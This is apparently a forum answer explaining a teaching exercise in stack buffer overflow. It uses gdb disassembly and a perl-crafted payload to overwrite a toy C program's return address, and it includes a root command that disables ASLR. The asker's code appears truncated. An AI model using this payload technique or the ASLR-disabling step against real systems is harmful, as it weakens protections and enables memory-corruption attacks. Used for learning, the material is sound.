I just wrote a C Code which is below :
#include
#include
void func(char *str)
{
char buffer[24];
int *ret;
For what I understand, you want the code to execute the instruction x=1;
and then jump over the next printf so it will only print x is 0
. There's no way to do that.
However, what could be done is making func() erase it's own return address so the code would jump straight to printf("\nx is 0\n\n");
. This means jumping over x=1;
too.
This is only possible because you are sending to func() whatever is passed through the cmd-line and copying directly to a fixed size buffer. If the string you are trying to copy is bigger then the allocated buffer, you'll probably end up corrupting the stack, and potentially overwriting the function's return address.
There are great books like this one on the subject, and I recommend you to read them.
Loading your application on gdb and disassembling the main function, you'll see something similar to this:
(gdb) disas main
Dump of assembler code for function main:
0x0804840e : lea 0x4(%esp),%ecx
0x08048412 : and $0xfffffff0,%esp
0x08048415 : pushl -0x4(%ecx)
0x08048418 : push %ebp
0x08048419 : mov %esp,%ebp
0x0804841b : push %ecx
0x0804841c : sub $0x24,%esp
0x0804841f : movl $0x0,-0x8(%ebp)
0x08048426 : mov 0x4(%ecx),%eax
0x08048429 : add $0x4,%eax
0x0804842c : mov (%eax),%eax
0x0804842e : mov %eax,(%esp)
0x08048431 : call 0x80483f4 // obvious call to func
0x08048436 : movl $0x1,-0x8(%ebp) // x = 1;
0x0804843d : movl $0x8048520,(%esp) // pushing "x is 1" to the stack
0x08048444 : call 0x804832c // 1st printf call
0x08048449 : movl $0x8048528,(%esp) // pushing "x is 0" to the stack
0x08048450 : call 0x804832c // 2nd printf call
0x08048455 : add $0x24,%esp
0x08048458 : pop %ecx
0x08048459 : pop %ebp
0x0804845a : lea -0x4(%ecx),%esp
0x0804845d : ret
End of assembler dump.
It's important that you notice that the preparation for the 2nd printf call starts at address 0x08048449
. In order to override the original return address of func()
and make it jump to 0x08048449
, you'll have to write beyond the capacity of char buffer[24];
. On this test I used char buffer[6];
for simplicity purposes.
While in gdb, if I execute:
run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
this will successfully override the buffer and replace the address of return with the address I want it to jump to:
Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
x is 0
Program exited with code 011.
(gdb)
I will not explain every step of the way because others have done it so much better already, but if you want to reproduce this behavior directly from the cmd-line, you could execute the following:
./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
Keep in mind that the memory addresses that gdb reports to you will probably be different than the ones I got.
Note: for this technique to work you'll have to disable a kernel protection first. But just if the command below reports anything different from 0:
cat /proc/sys/kernel/randomize_va_space
to disable it you'll need superuser access:
echo 0 > /proc/sys/kernel/randomize_va_space